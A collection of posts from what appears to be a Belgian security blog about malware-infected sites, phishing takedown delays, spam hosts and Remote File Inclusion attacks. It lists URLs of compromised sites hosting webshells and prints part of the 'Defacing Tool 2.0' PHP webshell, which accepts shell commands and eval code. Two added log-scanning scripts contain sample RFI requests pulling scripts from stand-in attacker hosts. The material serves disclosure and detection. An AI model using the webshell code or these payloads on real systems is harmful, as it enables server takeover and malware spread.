• Web2.0 hype and elections : blablabla

    After Obama there was, and still is, much hype about the fact that Obama won the elections thanks to the web. Which is pure bullshit of course. The web makes communication across such a big geographic area with such dispersed voting blocs more professional and easier, but it didn't switch or make the election.

    What made the election (besides the fact that the Clinton campaign was chaotic) was in fact that in the primaries he had the best field workers on the ground everywhere and used every internal administrative trick in the book to get every delegate he could. If you looked behind the hype you could see that during the fight with Clinton it was not about the web, it was about the very local rules of the local primaries and delegates. Those who also read his biographies in the newspapers at the time know he won his senate seat the same way. He is known as a street fighter in politics with much more attention to policy, rules and dealmaking than to soundbites and speeches. Those were different, but they didn't make his victories.

    But all those things are lost after an election and only the rhetoric and the drama are kept in history.

    So some journalists say that this election here will be decided by twitter and facebook and the web, and the candidates are all losing time and effort on those things in the hope of getting some attention (and dream about the votes). But this is not important. For the moment it seems like "this is not an election" because on the surface nobody seems to really care about it.

    The political parties have their facebook and their twitter, but the number of friends on these is just absolutely ridiculous in comparison with the web2.0 hype.

    CD&V has a bit more than 1000 friends (the biggest party, in fact)

    and Vlaams Belang, which has much more leverage on the web than in the mainstream media, has about 5000 friends (but many more voters).

    Facebook? Who cares? Just an addendum, not something to lose your time on when there are a lot of other activities that can have a real impact.

    It is much more important to have a really good integrated website and extranet to keep your message and actions coordinated and professional.

    The rest are drops in the ocean. You have no idea what it will add to your popularity and what the risks are.

    It will only explode if you can make your message the center of the electoral debate. And here again, the main center of action is OFFLINE not online. Your Online success depends totally on your OFFLINE success and not vice versa. Whatever the smart marketeer wants to tell you.

    And the same goes for a lot of other stuff and products.

  • PS.be infected with malware in April

    The PS is the main party in Wallonia and one of the main contenders to deliver the premier of Belgium after the national elections.

    On one page of their enormous site, someone injected links to malware-downloading sites, according to the Google analysis:

    http://google.com/safebrowsing/diagnostic?site=ps.be/

    The sites that were injected were spy-protection12.com/, google-server02.com/, spy-protection14.com of which the second one is the main distributor of malware.

    You can follow the infections on Belgian networks according to Google badware analysis in one screen here. If you want others added, just mail me.

    You can run the same test on your own domain by appending the domain name, or AS:xxxx for a whole autonomous system, to this URL:

    http://google.com/safebrowsing/diagnostic?site=

  • belsec netvibes dashboard gets a relift

    Until now there was a bit of everything.

    Now we have only kept the tools and links worth keeping an eye on that have something to do with IT security.

    We will check those links in the coming weeks and fill in the backlog of a few hundred new resources. Those will be added.

    Other changes are possible and probable. The work will be finished by the first of September at the latest.

    But then you will have one interface for all the online apps and the interesting, important links that you should have if you have something to do with security.

    The rest of the links are in diigo.com, which is still open.

  • let your server be used as a 'hacked' attack platform

    Another "hack another server" interface that can be placed on hackable servers:

    "Owned by Spyn3t"

    I think some version of the code is here

    and the shell code is something like this

    if it is not well placed it will look like this

    http://www.divinenine.net/article.php?article_id=1

    and otherwise it gives access to all data on the hacked server and to scripts to abuse it and attack other servers

    http://www.campingapollo.ro/class.php

    http://www.vertigofilms.es/ccmail/index.php


  • some changes at my facebook page (news)

    I have added the twitter feed for information security (about 100+ RSS feeds of infosecurity twitter feeds)

    I have added the feed from this blog to the RSS application

    If someone knows how to make interesting ITsec applications for Facebook, contact me, because the available platforms drove me nuts

  • twittering and blogging - senseless discussion

    There is some discussion about the number of bloggers that have switched to twittering and how sorry some feel that those bloggers have gone.

    They have not gone. They were just copy/paste bloggers, or just adding links without much comment, and found that twittering was much easier and better for them.

    So it is better that those links/small-ideas bloggers have found a better tool.

    My simple links are on twitter and diigo.com now, and the thoughts and facts that need more than 160 characters are here.

    Each medium has its advantages, and let us use each to its best advantage.

  • poor facebook environment

    While everybody is looking at the way facebook will handle the privacy crisis and how many millions of users will add themselves to the tool, it is only if you have been playing around a bit in their application environment that you understand that this is their weakest link.

    If you are used to netvibes and the simplicity of adding links, RSS feeds and other stuff to your pages, then you are quite astonished that they have made it so difficult in Facebook, while they should have made it much easier because of the scale of their operation.

    It is also something that you see on other pages: the number of feeds and applications is quite limited.

    So facebook may be fun to poke at and to leave some discussions and some pix and stuff like that, but it is far too limited to be a working environment to stay around in for too long (the number of other things on the real internet that you will miss will be much too great if you do such a thing).

  • forgot about your normal telephone system (PABX)?

    Well, it can get hacked - maybe it is already abused - and you don't know it (if you don't look at the bill).

    "[Private automatic branch exchange] PABX hacking and fraud... is happening more and more," Australian Federal Police (AFP) investigator Alex Tilley said at last week's AusCERT 2010 conference. "It's been around for donkey's years, but in the last few months we've seen domestically and globally a major up kick in the amount of money that's being lost through PABX hacking.

    "You go home as a system administrator at night, come in the next morning and you've got an email from a telco saying 'Hey, by the way, you just made AU$30,000 (£17,290) worth of calls to Cuba last night, is that normal?'"
    http://www.zdnet.co.uk/

    So, do you have a firewall in front of it? (there are a few of them) And did you do a modem test (you would be surprised) and a penetration test (get under the bed if you don't want to know the results)?

    Oh, this isn't the case in Belgium? You believe that?

    Well, good for you and for the cheap telephone shop next to you, or in another country, with a dial-in link to your PABX.

  • Top 5 Belgian bad hosts according to Project Honeypot

    Project Honeypot has honeypots around the world; you can even join by adding some code to your website. It indexes all the attacks it sees and gives you the possibility to see the worst offenders in spam, dictionary attacks, comment spam or just abused mail servers, with all the proof added. But even if they only have some spam in their honeypots, you can be sure that there were hundreds or thousands more that were sent from these addresses.

    These are the worst Belgian hosts with the most incidents since the Project Honeypot started. It is a total for spam, dictionary attacks and so on.

    If we look at these we see that there is one Skynet installation, one Skynet user, one Verizon Business user and two servers in Ukraine using so many Belgian hosts that the honeypot thinks they are Belgian. It means that the only thing that can be done is blocking those Ukrainian hosts and cleaning up the connections those Belgian hosts and servers have with those installations.

    They are all known as spammers and blacklisted as such in some lists.

    Malicious IP     Event      Total  First       Last        Analysis
    213.181.48.24    Bad Event  3,455  2009-03-30  2010-05-25  according to Robtex it is a Skynet server and blacklisted as spammer
    195.5.125.10     Bad Event  1,700  2007-11-05  2010-05-26  Ukraine server with many Belgian links
    194.78.199.165   Bad Event  1,623  2009-05-15  2010-05-25  Robtex says it is a Skynet user
    212.190.94.67    Bad Event  1,560  2009-08-24  2010-05-07  Phone House Belgium
    195.5.124.250    Bad Event  1,537  2008-03-21  2010-05-26  Ukraine spammer with many links to Belgium

  • phishing attack against French-speaking users of paypal underway

    This is what we see if we look at the number of websites set up to steal their login information:

    http://antiphishing.reasonables.com/search/paypal

  • mx links

    all viruses
    http://support.clean-mx.de/clean-mx/viruses
    http://support.clean-mx.de/clean-mx/viruses.php?response=alive

    phishing top 50
    http://support.clean-mx.de/clean-mx/phishing
    http://support.clean-mx.de/clean-mx/phishing.php?response=alive
    http://support.clean-mx.de/clean-mx/phishing?scope=viruses&as=AS2508

    change the ASN (AS2508 in this example)
    http://support.clean-mx.de/clean-mx/viruses?scope=viruses&as=AS2508

    Belgium only (country=BE)
    http://support.clean-mx.de/clean-mx/phishing.php?country=BE&sort=email%20asc,review%20desc&response=alive
    http://support.clean-mx.de/clean-mx/viruses.php?country=BE&sort=email%20asc,review%20desc&response=alive

    http://support.clean-mx.de/clean-mx/viruses.php?response=alive&country=BE
    http://support.clean-mx.de/clean-mx/portals.php?response=alive&country=BE
    http://support.clean-mx.de/clean-mx/phishing.php?response=alive&country=BE

  • analysis 2H2009 : .be and .eu domain extensions were the hardest hit by phishers among the big domain zones

    This is what one can conclude from this published report. Curious what the response will be.

    First I also want to make clear that more methodological data should be published together with each report (as it can change) to be fully professional, and scientifically clear definitions and comparisons between different datasets are a necessity for a good understanding. Nonetheless, the report gives us some clear indications, and these indications can be coupled with other information.

    APWG (Anti-Phishing Working Group) is the international organisation that coordinates and analyzes the fight against phishing (the stealing of customers' logins, for example of banks, by setting up fake login pages and sending links with so-called security alerts). Their yearly reports about the state of phishing in the world are based on one of the most complete global databases around, thanks to the collaboration with many local and other initiatives.

    The researchers make a distinction between a phishing host and a phishing attack, because a phishing host can host many attacks against the same or different institutions. For this reason it is important to bring down phishing hosts as quickly as possible, not only to limit the number of victims but also to limit the number of attacks. As the phishing hosts may be part of a fast-flux botnet, it is more difficult for the botnet master to coordinate new, more sophisticated attacks if his phishing hosts are brought down and cleaned up.

    The main conclusion of the research is that more than half of all phishing attacks around the world in 2009 could be attributed to one group, called the Avalanche gang. They professionalized the tactics of the Storm gang by using fast-flux hosting on individual infected computers around the world, with domain names bought from registries and registrars that don't mind about security. In the second half of 2009 the gang had to change tactics and diminished its number of attacks (it was responsible for about 2/3 of all phishing attacks because each of their phishing domains hosted around 40 phishing attacks) after one of its main control centers was brought down because the criminal ISP was cut off the internet by its peers (other ISPs refused to accept traffic from that ISP or to send traffic to it). The effect of that action was dramatic but limited in time.

    Fast-flux attacks don't use a one-domain-one-server architecture; a domain is something that can be served from tens or hundreds of infected PCs or hacked servers around the world. This means that it is no use to bring down a physical server, because the domain name will pop up somewhere else around the world. The only way to take down these domains is by blocking the domain name in the central DNS of the organisation responsible for the domain zone.

    In global numbers there were nearly 60.000 domains used for phishing active per year since 2008, bought at more than 300 different TLDs (but mainly at 5). They were used for about 180.000 attacks against 40 financial institutes in the second half of 2009 (or, in general, one site used for 3 attacks).

    IDN attacks (in which numbers and letters are interchanged to confuse the user) are seldom used, while only about 5000 to 6000 phishing domains are located on an IP address.

    The 'Avalanche gang' tested and selected several domain registrars to see how long it would take them to suspend their fast-flux phishing domain names. These domain names were often just a series of letters and numbers that varied a little bit and were often registered in several domain extensions. We saw it here quite often with the .be and .eu domain extensions. It seems that a cross-check between domain extensions would have prevented them from doing this (if one domain is a clear phisher in one domain extension, a cross-check with the whois data and a screenshot could have shown up the other phishing hosts in other domain extensions; the checks could all be automated).

    Several registries have augmented their security and take-down procedures because of this attack. This was the case in general for several big registries (.biz, .info, .org, .uk) and some small ones after they were attacked (like .hn and .im).

    In April 2010 the 'Avalanche gang' seemed to have diminished its operation quite dramatically. From 12.793 attacks on 498 domains in July 2009, the 'Avalanche gang' was only responsible for 59 attacks on 59 phishing hosts in April 2010. The real question remains the same as when the Storm spam gang disappeared: what or who next? There is a lot of talk about the Canadian Pharmacy spam gang nowadays.

    The report prides itself that the lifecycle of the 'Avalanche' fast-flux phishing hosts was shorter than that of the other phishing hosts because of the interest everyone was giving to this gang, but in other professional anti-phishing literature you read that a phishing host has to be taken down within 4 hours, because most of the victims are made within 4 hours of the launch of the spam for the phishing domain.

    This is far from being the case, but it is difficult to interpret the numbers because they may be influenced by some domains or ISPs or hosts that don't react very quickly, if at all. The numbers would be even more interesting if they were cleaned of phishing hosts at criminal ISPs who advertise the fact that they don't take down any criminal website (bullet-proof hosting). Nevertheless, the median time needed to bring down a phishing host is still nearly 12 hours. This is still 8 hours too long to make online phishing ineffective. If you want to discourage online phishers, you should invest your main resources in a fast response and take-down.

    Because the difference between the fast-flux phishing domains of the Avalanche group and the others is too big, you can't have a meaningful general indication for all the phishing domains.

    The median uptime for phishing .be domains from the 'Avalanche group' is still 10 hours, which is the 6th of the 9 domain extensions that hosted the most Avalanche phishing domains in the second half of 2009. You could also note that 3 big domain extensions (.cn, .info and .org) kept this uptime under or just above 4 hours.

    This is totally not the case for the other phishing attacks, where NOT one domain extension can bring down the phishing host in the same timeframe. The best is .info with 10 hours, which is 8 hours longer (a working day) to bring down a non-Avalanche-gang phishing host. The .be domain needs more than 20 hours (median time) to bring down a phishing host, which is the 9th slowest (out of the 10 main domain extensions with phishing hosts). The .eu is the LAST. It needs 22 hours to bring down a phishing host that is not from the Avalanche gang (and those were very few, which means that it took a lot of time for most of these phishing hosts). The .eu is also the LAST one in bringing down Avalanche gang phishing domains, which shows that even when it was heavily abused it didn't set up the necessary fast tracks to fend off the attackers and discourage them. As the internet is the Wild Wild West, the best defence for now is to try to fend off the attacker in the hope that he will concentrate on another victim that hasn't put so much time and money into security.

    One should remember that taking down the domain name of the host is the ONLY way to deactivate a phishing host if the phishers use a fast-flux botnet. With fast-flux hosting the domain name is hosted on another server in another country every so many visits or minutes. This is done by an infrastructure of DNS servers or procedures set up by the botnet and the infection software on the individual hosts or zombies. This makes it more or less impossible for law officers to bring down phishing domains by bringing down one server or infected PC. They have to take down the core to bring down the phishing domains, and that is either the botnet infrastructure (or its criminal ISP) or the domain names themselves at the root DNS of the domain extension.

    This blog was active in pushing the FCCU and dns.be to bring down a number of fast-flux domains in the .be and in trying to convince them to use a fast track between them. But it is clear that a more permanent and automated system is necessary. At the time this blog said that the reputation of the domain extension .be as such was at stake if no drastic actions were taken. What was surprising was that most of the information in the Whois (identification of the owner) seemed false or needed verification before activation. This process can also be automated; checking telephone numbers against countries and checking the email addresses can be automated, for example. At the time a process was put in place by which the cyber police FCCU contacted the justice department, based upon a standardized demand to take down a fast-flux phishing domain under the Belgian cybercrime law (I suppose), which was sent to DNS.BE after signature by a judge for the effective take-down (or should we say blocking) of the respective domain names in the root server of the .be domain extension.

    When we look now at the numbers and the time necessary for a take-down, it is clear that those efforts may have been gigantic and effective at the time, but have been bypassed by those of a whole series of other domain extensions. The net effect of this is that as the other domain extensions became less interesting, the .eu and .be domain extensions became increasingly more interesting. It didn't help the .be domain extension that it is often sold together with the .eu domain extension and that the main online crime gangs already had some experience with the .be domain extension from the period in which they could try it totally free for a year. As this blogger discovered at the time, this campaign was abused by international crime gangs to infiltrate the Belgian web space. If such a campaign were to be relaunched today, the effects would be even more disastrous because the online crime world is much better organized and experienced than ever before, thanks to all the money they have amassed during the last years.

    If you look at the numbers of phishing domains for each of the main domain extensions that were used by phishers worldwide in the second half of 2009, you will see clearly that the .be and .eu domain extensions were at that time the favourites of criminals. There are practical reasons for that. You don't need to live in Belgium to own a .be domain name, and the registration is quasi-automated without many controls. Your domain name can be activated immediately, which easily leaves you the opportunity (in a weekend, for example) to launch a phishing campaign without being taken down in 4 hours. And even during working days it would take more or less 10 hours to take them down.

    When we analyze the numbers we can conclude the following for the .be domain (the numbers are even worse for the .eu domain extension).

    Among all the domain extensions of the world, the .be domain extension was in the second half of 2009, with 297 unique .be phishing domains, the 6th domain extension in the world based upon the total number of unique registered domain names used solely for phishing, and of these 287 were registered by the Avalanche gang, which makes the .be domain extension the 4th of all domain extensions worldwide that were used by that gang.

    These .be domains were used by the Avalanche gang for 915 attacks against the users of 40 financial institutions. This means that the .be Belgian domain space was the 9th worldwide in the number of such attacks by the Avalanche gang. I am not sure that we should be proud of that.

    I know dns.be will say that even these numbers are very limited as a percentage (we had nearly 1 million .be domain names at that time), but APWG states clearly that, independently of the number of domains a domain extension has, they should be very alarmed if more than 2.9% of those are used for phishing. For the .be domain it is about 3.1%. ICANN has also issued several alarms in 2009 and has tried to help several registrars to stop the infiltration. Several domain extensions have taken drastic actions in 2009 and 2010 (.ru, .hk and .cn) to stop the flood of domain names registered for malicious use. It is time for .be to take appropriate actions in its marketplace if it doesn't want to be seen as a dangerous domain by firewalls (which now block on domain extension and geography) and malware reputation tools.

    In that respect one can say that .be has passed the 1 million domains, but that only makes the problem worse. If we exclude all the smaller domains and only take into account the domain extensions with more than nearly a million domains, then the .eu and .be domain extensions were the most used by phishers as a percentage. It means that if you want to play in the garden of the big boys, you will have to change the way you are doing things, you will have to take on new responsibilities and you will have to invest enough to keep the domain extension safe.

    When you have that many users and investors you are morally obliged to invest much more in security and make it an obligation throughout your organisation and operation, even if some people and vested interests haven't made the mental switch yet. It is not possible anymore to block a domain extension with one million domains, but the loss would be enormous if that would become more and more the case, if more and more enterprises and networks all over the world start asking: do we need websites from Belgium if all that malware and phishing starts spreading over its domains? For 95% of the internet the .be domains are not necessary, and most of the important .be domains have also bought other domain extensions and can switch their main focus easily.

    And what would it take? Look at the numbers. We are looking at a total of nearly 300 domains in 6 months, which means generally about 50 each month, or nearly two take-downs from the central DNS server a day. And this isn't even true, because those domains are registered in small packages that are not even so difficult to spot in the registration database (for insiders). With backup and so on, you would in fact need two to three take-down officers who follow up all the incoming demands and forward the complaints to the CERT for control if not enough proof is added, or to the FCCU if they come from certified security sources. It is not that these security researchers wouldn't be willing to work together with official resources to take down these sites immediately, as long as they see an immediate effect.

    So you have the 1 million domains, you have a new direction, and now it is time to show that you are ready to make of the .be domain extension a domain extension where it is "safe to .be" (copyright).

  • worst RFI attackers for May - blocklist

    Columns: Hostname, CNAME or Alias (more INFO) | First Offensive Action (GMT) | Last Offensive Action (GMT) | In Offensive State For | Quality of Administration

  • Belgian RFI infected sites

    We have found some listings of RFI-infected sites, and these are the Belgian offenders:

    www.sitealacarte.be

    The consequence for the site is that it is already being blocked by a number of automatic anti-malware engines.

  • something more about the RFI attack (still active)

    Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity it can lead to, to list a few:

    • Code execution on the web server
    • Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross-site scripting (XSS)
    • Denial of Service (DoS)
    • Data theft/manipulation

    http://en.wikipedia.org/wiki/Remote_File_Inclusion

    Now if you don't find that serious, what would you?

    It means that all the sites that are RFI-infected and are being used for stupid things, like running searches against other sites, can be abused for other stuff as well.
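    As an added example (not code from the original post), this Python script shows how to spot RFI probes in your own web server logs: it parses Apache "combined" format lines, percent-decodes the query parameters and reports any parameter whose value is an absolute http/https/ftp URL pointing at a host you do not serve yourself, then counts attempts per source so the noisy attackers stand out. The log lines and the OUR_HOSTS set are constructed assumptions.

```python
"""Flag Remote File Inclusion (RFI) probes in web server access logs.

Added example, not code from the original post. The sample log lines are
constructed; OUR_HOSTS is an assumed list of the site's own host names.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Assumption: the virtual hosts we serve ourselves. A parameter that points
# back to one of these is a normal redirect/link, not a remote include.
OUR_HOSTS = {"www.example.be", "example.be"}

# URL schemes a PHP include() will fetch remotely when allow_url_include is on.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Apache/nginx "combined" log format:
# ip ident user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_indicators(target):
    """Return (param, remote_host, value) for each query parameter whose
    value is an absolute URL to a host we do not serve ourselves."""
    hits = []
    query = urlsplit(target).query
    # parse_qsl percent-decodes, so page=http%3A%2F%2F... is caught as well.
    # keep_blank_values keeps odd suffixes such as idv6.txt??? intact.
    for name, value in parse_qsl(query, keep_blank_values=True):
        candidate = value.strip()
        if not candidate.lower().startswith(REMOTE_SCHEMES):
            continue
        host = urlsplit(candidate).hostname
        if host and host not in OUR_HOSTS:
            hits.append((name, host, candidate))
    return hits


def scan(lines):
    """Return one alert dict per RFI-looking parameter in the given log lines."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for param, host, value in rfi_indicators(rec["target"]):
            alerts.append({
                "ip": rec["ip"],
                "time": rec["time"],
                "status": int(rec["status"]),
                "param": param,
                "remote_host": host,
                "value": value,
            })
    return alerts


def attackers(alerts):
    """Count attempts per source IP, most active first: the raw material
    for the kind of per-host RFI blocklist shown earlier on this page."""
    return Counter(a["ip"] for a in alerts).most_common()


# Constructed sample: two probes from one host (one percent-encoded), a normal
# page request, a redirect to our own site, and an ftp:// include attempt.
SAMPLE_LOG = """\
203.0.113.7 - - [03/May/2010:17:25:53 +0000] "GET /index.php?page=http://evil.example/idv6.txt??? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.7 - - [03/May/2010:17:25:54 +0000] "GET /index.php?page=http%3A%2F%2Fevil.example%2Fshell.txt%3F HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.9 - - [03/May/2010:17:26:10 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://www.example.be/" "Mozilla/5.0"
198.51.100.9 - - [03/May/2010:17:26:11 +0000] "GET /redirect.php?url=http://www.example.be/news HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.44 - - [03/May/2010:17:27:00 +0000] "GET /admin/?inc=ftp://203.0.113.99/inc.txt HTTP/1.1" 404 230 "-" "Mozilla/4.0"
"""


if __name__ == "__main__":
    found = scan(SAMPLE_LOG.splitlines())
    for a in found:
        print(f'{a["time"]} {a["ip"]} {a["param"]}={a["value"]} '
              f'-> {a["remote_host"]} (HTTP {a["status"]})')
    print("attempts per source:", attackers(found))
```

    A 200 on such a request does not prove the include succeeded (allow_url_include may be off), so treat the hits as triage candidates and check the PHP configuration and the script named in the path.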

    More resources are posted through the twitter channel.

  • .be sites that distribute all kinds of trojans


    To clean up this stuff, find all the contact info here RSS

  • see the online php defacing tool

     

    1. SysCom]  THE SCRIPT

      13 okt 2009 - <a href="mailto:revengans@gmail.com">?</a></font><br> <font size=2>by r3v3ng4ns - revengans@gmail.com </font> </b></div></td></tr> ...
      www.sysecom.com.ar/v3/view_doc.php?view_doc=6 - In cache 
    2. Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com

      20 feb 2010 - Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com.
      gablesguesthousebnb.co.uk/56.dat - In cache (only his name is here now)
    3. Defacing Tool Pro v1.9.3 keep it priv8! ] ? by r3v3ng4ns ...

      25 april 2010 - Defacing Tool Pro v1.9.3 keep it priv8! ] ? by r3v3ng4ns - revengans@gmail.com. sysname: Linux. nodename: srv108.hostingenchile.cl. release: 2.6.18-164. ...
      www.prefser.cl/imagenes/pro.php - In cache  ANd this is what it looks like
    bo07
  • european-fair-trade-association.org infects its visitors with trojans

    They are infected with a page with a PHP script that tries to infect the user, gets past all the Firefox defenses and is luckily stopped by my antivirus.

    Local Settings\Application Data\Mozilla\Firefox\Profiles\uc9yqsk8.default\Cache\EEAA43FFd01

    The naming is generic, so it may be that this specific infection is somewhat specific; the code is copied and published (follow the diigo or twitter accounts of mailforlen) so you can analyze it.

    It is not stopped by a number of network protection levels....

    the same script is also placed here

    Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com

    20 Feb 2010 - Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com.
    gablesguesthousebnb.co.uk/56.dat

    1. Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com

      5 April 2010 - Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com.
      truknowledge.com/20.dat?a
    2. Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com if you ...

      19 March 2010 - Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com if you are going to modify the code, please keep the name of its original authors and please, ...
      aiurea123.go.ro/cmd.txt
    3. Hosted On psend.com */ /* header */ <!-- Defacing Tool 2.0 by

      17 Oct 2009 - Defacing Tool 2.0 by r3v3ng4ns revengans@gmail.com if you are going to modify the code, please keep the name of its original authors and please, ...
      www.psend.com/users/jhonnys/tool25.txt

    and as you see GOOGLE DOES NOT WARN you

    This is part of the code:

    <!--
    Defacing Tool 2.0 by r3v3ng4ns
    revengans@gmail.com
    if you are going to modify the code, please keep the name of its original authors
    and please get in touch with me...

    hey folks, seriously, there are a lot of bastards who simply use it, don't just be a sucker of the script,
    don't be an imbecile lamer, don't be a shitty script kiddie, don't be a jerk, help to improve it too!!
    -->
    <?php

    //The Rules
    include("therules25.txt");

    // every control parameter is taken from the query string first and then from
    // any request source ($_REQUEST covers GET, POST and cookie values), so the
    // same request can drive a directory change, a shell command, a file upload,
    // a directory listing or an eval() of attacker-supplied code
    if(empty($chdir)) $chdir = @$_GET['chdir'];
    if(empty($chdir)) $chdir = @$_REQUEST['chdir'];
    if(empty($cmd)) $cmd = @$_GET['cmd'];
    if(empty($cmd)) $cmd = @$_REQUEST['cmd'];
    if(empty($fu)) $fu = @$_GET['fu'];
    if(empty($fu)) $fu = @$_REQUEST['fu'];
    if(empty($list)) $list = @$_GET['list'];
    if(empty($list)) $list = @$_REQUEST['list'];
    if(empty($eval)) $eval = @$_GET['eval'];
    if(empty($eval)) $eval = @$_REQUEST['eval'];
    if(empty($evalcode)) $evalcode = @$_POST['evalcode'];
    if(empty($evalcode)) $evalcode = @$_GET['evalcode'];
    if(empty($evalcode)) $evalcode = @$_REQUEST['evalcode'];
    if(empty($evalfile)) $evalfile = @$_GET['evalfile'];
    if(empty($evalfile)) $evalfile = @$_REQUEST['evalfile'];

    // the command string is cleaned of escaping and whitespace before use
    $cmd = stripslashes(trim($cmd));
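    Added example, not code from this blog or from the tool's author: a small Python scanner over constructed web server access-log lines that flags the two things this page describes, an include-type parameter whose value is a remote URL (the RFI pattern from the RFI section above) and requests carrying the control parameters the Defacing Tool 2.0 fragment above reads (chdir, cmd, fu, list, eval, evalcode, evalfile). The log lines, the hypothetical paths and the INCLUDE_PARAMS list are my assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameter names the Defacing Tool 2.0 fragment above reads from $_GET/$_REQUEST/$_POST.
WEBSHELL_PARAMS = {"chdir", "cmd", "fu", "list", "eval", "evalcode", "evalfile"}
# Parameters typically handed to include()/require(); assumption: a generic starter
# list, extend it with the parameter names your own application uses.
INCLUDE_PARAMS = {"page", "file", "include", "inc", "path", "template", "module"}

# Common/combined access-log prefix: ip ident user [time] "METHOD target proto" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
REMOTE_RE = re.compile(r"^(https?|ftp|php|data)://")

def classify(line):
    """Return findings (kind, param, value) for one access-log line, [] if clean."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    findings = []
    for name, values in query.items():
        lname = name.lower()
        for value in values:
            # parse_qs decoded once; decode again so a double-encoded http%253A... value still matches
            if lname in INCLUDE_PARAMS and REMOTE_RE.match(unquote(value).strip().lower()):
                findings.append(("rfi", name, value))
        if lname in WEBSHELL_PARAMS:
            findings.append(("webshell", name, values[0]))
    return findings

def scan_log(text):
    """Run classify() over every line; return {line_no: findings} for hits only."""
    hits = {}
    for no, line in enumerate(text.splitlines(), 1):
        findings = classify(line)
        if findings:
            hits[no] = findings
    return hits

# Constructed sample lines (TEST-NET addresses, hypothetical paths), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [20/May/2010:14:22:29 +0200] "GET /index.php?page=http://198.51.100.9/shell.txt? HTTP/1.1" 200 512
203.0.113.7 - - [20/May/2010:14:23:01 +0200] "GET /images/tool.php?cmd=uname+-a&chdir=/var/www HTTP/1.1" 200 1280
198.51.100.20 - - [20/May/2010:14:25:10 +0200] "GET /index.php?page=about HTTP/1.1" 200 3072
"""
```

    Calling scan_log(SAMPLE_LOG) flags the first line as an RFI attempt and the second as webshell traffic; the third, a normal page request, is left alone.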

  • if you publish your code online like photo.com you have a problem

    One of the domains that are frequently listed for the moment in the database of clean-mx is photo.com, which seems to be a Belgian operation. The problem is 'unknown html', and the main reason why they are in this database is that some html and other code has been published openly for all to see - and who knows, to analyse and abuse.

    If you know that photo.com is also a big online photo development company with many users who pay by credit card, you would understand the dangers.

    The other danger of course is a business or reputation problem, because some installations will use their listing to block them because of insecurity risks.

    http://ch.foto.com/js/scripts.js?t=200912151800

    has code like this online for all to see (interesting pop-up code for phishers):

    // opens a fixed 542x630 popup in the top-left corner of the screen
    function calcul(url,nom) {
    window.open(url,nom,'width=542,height=630,scrollbars=yes,resizable=no,top=0,left=10');
    }

    // opens a 410x400 popup centred on the screen with menu bar, location bar,
    // status bar and toolbar switched off (lalargeur = width, lahauteur = height)
    function condi(url) {
    var lalargeur = 410 ;
    var lahauteur = 400 ;
    var yes = 1;
    var no = 0;
    var menubar = no;
    var scrollbars = yes;
    var locationbar = no;
    var directories = no;
    var resizable = no;
    var statusbar = no;
    var toolbar = no;
    var t = (screen.height-lahauteur)/2 ;
    var l = (screen.width-lalargeur)/2 ;

    var propriete = "width=" + (lalargeur) + ",height=" + (lahauteur) + ",top=" + t +",left=" + l ;
    propriete += (menubar ? ",menubars" : "") + (scrollbars ? ",scrollbars" : "")
     + (locationbar ? ",location" : "") + (directories ? ",directories" : "") + (resizable ? ",resizable" : "")
     + (statusbar ? ",status" : "") + (toolbar ? ",toolbar" : "") ;

    var popup = window.open(url, 'TITRE',propriete) ;
    }

    // same 410x400 popup, placed at the top of the screen with a named window
    function cond(url,nom) {
    window.open(url,nom,'width=410,height=400,scrollbars=yes,resizable=no,top=0,left=25');
    }

  • Your mailinglistprovider.com used for spam

    It looks modern to have cloud-based services somewhere out there which are being used by thousands of people

    until one of them uses it for spam and the whole service can be blacklisted

    http://support.clean-mx.de/clean-mx/phishing.php?response=alive&country=BE

    783138
    2010-05-19 22:20:20 - Phishtank evidence 981129 - no previous evidence recorded - status: alive (evidence of last contact saved May 20 2010 17:00:00 CEST, cleanmx screenshot as of May 20 2010 14:22:29 CEST)

    78.41.65.4 (AS8368) - ymlp93.com - http://t.ymlp93.com/maxameqatamhumarauhs ...
    abuse contact: abuse@benesol.be 78.41.65.31 YOURMAILINGLISTPROVIDER